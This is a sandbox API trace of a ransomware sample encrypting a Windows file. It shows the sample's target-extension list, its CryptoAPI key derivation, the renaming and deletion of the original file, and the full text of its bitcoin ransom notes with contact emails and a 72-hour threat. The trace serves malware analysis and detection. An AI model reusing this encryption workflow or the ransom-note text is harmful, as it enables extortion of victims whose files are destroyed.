	[0158.858] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\"
	[0158.858] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\", lpString2="DeploymentConfig.2.xml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\DeploymentConfig.2.xml") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\DeploymentConfig.2.xml"
	[0158.859] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\ClickToRun\\DeploymentConfig.2.xml") returned 62
	[0158.859] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0158.859] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\ClickToRun\\DeploymentConfig.2.xml", cchLength=0x3e | out: lpsz="c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.2.xml") returned 0x3e
	[0158.859] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.859] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.2.xml", lpSrch="help_decrypt_your_files") returned 0x0
	[0158.859] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.2.xml" | out: lpString1="c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.2.xml") returned="c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.2.xml"
	[0158.860] lstrlenW (lpString="c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.2.xml") returned 62
	[0158.860] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0158.860] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.860] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0158.860] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.861] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0158.861] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0158.861] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0158.861] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.2.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.2.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0158.866] ReadFile (in: hFile=0x388, lpBuffer=0xfdc138, nNumberOfBytesToRead=0x566, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfdc138*, lpNumberOfBytesRead=0x18b350*=0x566, lpOverlapped=0x0) returned 1
	[0158.871] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0158.871] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcac48) returned 1
	[0158.874] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0158.874] CryptCreateHash (in: hProv=0xfcac48, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0158.874] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0158.874] CryptHashData (hHash=0xfb98f0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0158.875] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0158.875] CryptDeriveKey (in: hProv=0xfcac48, Algid=0x6610, hBaseData=0xfb98f0, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb90f0) returned 1
	[0158.875] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0158.875] CryptEncrypt (in: hKey=0xfb90f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0x566, dwBufLen=0x566 | out: pbData=0x0*, pdwDataLen=0x18af1c*=0x570) returned 1
	[0158.875] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0158.876] RtlMoveMemory (in: Destination=0xfdd3f8, Source=0xfdc138, Length=0x566 | out: Destination=0xfdd3f8) 
	[0158.876] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0158.876] CryptEncrypt (in: hKey=0xfb90f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfdd3f8*, pdwDataLen=0x18aefc*=0x566, dwBufLen=0x570 | out: pbData=0xfdd3f8*, pdwDataLen=0x18aefc*=0x570) returned 1
	[0158.877] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0158.877] CryptDestroyKey (hKey=0xfb90f0) returned 1
	[0158.877] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0158.877] CryptDestroyHash (hHash=0xfb98f0) returned 1
	[0158.877] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0158.878] CryptReleaseContext (hProv=0xfcac48, dwFlags=0x0) returned 1
	[0158.878] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0158.878] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0158.879] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0158.879] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0158.880] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.2.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 104
	[0158.880] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.2.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.2.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0158.881] WriteFile (in: hFile=0x390, lpBuffer=0xfdd3f8*, nNumberOfBytesToWrite=0x570, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xfdd3f8*, lpNumberOfBytesWritten=0x18b358*=0x570, lpOverlapped=0x0) returned 1
	[0158.885] CloseHandle (hObject=0x390) returned 1
	[0158.887] CloseHandle (hObject=0x388) returned 1
	[0158.887] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.2.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.2.xml")) returned 1
	[0158.891] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.2.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.2.xml")) returned 0
	[0158.891] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c4bfed4, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1d7a4d6f, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1da7a7ac, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MachineData", cAlternateFileName="MACHIN~1")) returned 1
	[0158.891] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c4bfed4, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1c4bfed4, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1c4bfed4, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UserData", cAlternateFileName="")) returned 1
	[0158.891] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x828cdbb9, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0xe25ce006, ftLastAccessTime.dwHighDateTime=0x1d8a64a, ftLastWriteTime.dwLowDateTime=0xe25ce006, ftLastWriteTime.dwHighDateTime=0x1d8a64a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{9AC08E99-230B-47e8-9721-4577B7F124EA}", cAlternateFileName="{9AC08~1")) returned 1
	[0158.891] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x828cdbb9, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0xe25ce006, ftLastAccessTime.dwHighDateTime=0x1d8a64a, ftLastWriteTime.dwLowDateTime=0xe25ce006, ftLastWriteTime.dwHighDateTime=0x1d8a64a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{9AC08E99-230B-47e8-9721-4577B7F124EA}", cAlternateFileName="{9AC08~1")) returned 0
	[0158.891] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0158.892] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0158.893] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun"
	[0158.893] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\*.*") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\*.*"
	[0158.893] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0158.894] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0158.894] wsprintfW (in: param_1=0x18b080, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\HELP_DECRYPT_YOUR_FILES.TXT") returned 67
	[0158.894] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0158.894] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0158.895] WriteFile (in: hFile=0x384, lpBuffer=0x18a438*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18b35c, lpOverlapped=0x0 | out: lpBuffer=0x18a438*, lpNumberOfBytesWritten=0x18b35c*=0xc46, lpOverlapped=0x0) returned 1
	[0158.898] CloseHandle (hObject=0x384) returned 1
	[0158.899] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a408, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a408*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0158.899] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0158.900] GetUserNameA (in: lpBuffer=0x18a2ec, pcbBuffer=0x18a404 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a404) returned 1
	[0158.901] wsprintfW (in: param_1=0x18b288, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0158.901] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0158.902] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0158.902] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0158.902] WriteFile (in: hFile=0x384, lpBuffer=0x18b288*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18b364, lpOverlapped=0x0 | out: lpBuffer=0x18b288*, lpNumberOfBytesWritten=0x18b364*=0x30, lpOverlapped=0x0) returned 1
	[0158.902] CloseHandle (hObject=0x384) returned 1
	[0158.903] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0158.903] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0158.903] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0158.904] wsprintfW (in: param_1=0x18b040, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\HELP_DECRYPT_YOUR_FILES.HTML") returned 68
	[0158.904] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0158.904] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0158.904] WriteFile (in: hFile=0x384, lpBuffer=0x18a834*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0x18a834*, lpNumberOfBytesWritten=0x18b358*=0x808, lpOverlapped=0x0) returned 1
	[0158.909] CloseHandle (hObject=0x384) returned 1
	[0158.909] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0158.910] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a81c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a81c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0158.910] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0158.911] GetUserNameA (in: lpBuffer=0x18a700, pcbBuffer=0x18a818 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a818) returned 1
	[0158.918] wsprintfA (in: param_1=0x18b248, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0158.918] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0158.918] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0158.918] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
